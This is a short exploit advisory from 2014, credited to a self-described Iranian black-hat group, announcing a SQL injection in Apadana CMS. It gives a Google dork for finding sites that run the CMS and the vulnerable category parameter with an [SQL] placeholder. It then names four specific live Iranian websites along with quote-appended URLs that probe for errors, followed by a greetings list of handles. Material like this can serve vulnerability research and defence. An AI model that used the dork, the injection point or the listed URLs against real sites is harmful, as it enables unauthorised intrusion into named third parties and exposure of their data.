Apadana CMS suffers from a remote SQL injection vulnerability. Note that this finding houses site-specific data.
122e5a72a6b60aa528956dc8cfaaad8b4971a382ce424a8ef9fd8aabae24348d
[0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0]
[0]
[0] Exploit Title : Apadana CMS Sql Injection Vulnerability
[0] Exploit Author : SeRaVo.BlackHat
[0] Vendor Homepage : http://www.apadanacms.ir/
[0] Google Dork : powered by apadana CMS
[0] Date: 2014/November/25
[0] Tested On : windows + linux | Mozila | Havij
[0] Software Link : http://www.itsecteam.com/products/havij-advanced-sql-injection/
[0]
[0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0]
[0]
[0] ::::::::::::::::::::::::::::::::::::::::::::::::::::::::
[0] ::: Apadana CMS Sql Injection Vulnerability :::
[0] ::::::::::::::::::::::::::::::::::::::::::::::::::::::::
[0] ::: Iranian Cyber ARmy ~ Iranian Black Hat :::
[0] ::::::::::::::::::::::::::::::::::::::::::::::::::::::::
[0]
[0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0]
[0]
[0] ::::::::::::::::
[0] ::::: DEMO :::::
[0] ::::::::::::::::
[0]
[0] Location : http://Target.com/?a=posts&b=category&c=[SQL]
[0]
[0]
[0] ::::::::::::::::
[0] ::::: ERROR ::::
[0] ::::::::::::::::
[0]
[0] http://wa-swimming.ir/?a=posts&b=category&c=20
[0] http://wa-swimming.ir/?a=posts&b=category&c=20%27
[0]
[0] http://beh-boshrooyeh.ir/?a=posts&b=102
[0] http://beh-boshrooyeh.ir/?a=posts&b=102%27
[0]
[0]
[0] http://www.kandimizbahloolabad.ir/?a=posts&b=1
[0] http://www.kandimizbahloolabad.ir/?a=posts&b=1%27
[0]
[0]
[0] http://padika.ir/?a=posts&b=category&c=1
[0] http://padika.ir/?a=posts&b=category&c=1%27
[0]
[0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0]
[0]
[0] Discovered by : SeRaVo.BlackHat [0] Hassan [0]
[0]
[0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0]
[0]
[0] General.BlackHat@Gmail.com . FB.com/general.blackhat
[0]
[0] MY FRIEND'Z : Unhex.coder + #N3T + Lupin 13 + AMOK + Milad.Hacking + Mr.Time
[0] SHD.N3T + MR.M@j!D + eb051 + Dr.SQ1 + Dr.3vil + RAMIN + ACC3SS + X3UR + 4li.BlackHat
[0] Net.editor + M3QDAD + M.R.S.CO + Hesam King + Evil Shadow + 3H34N + IraQeN-H4XORZ
[0] And All Iranian Cyber Army ...\.
[0]
[0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0]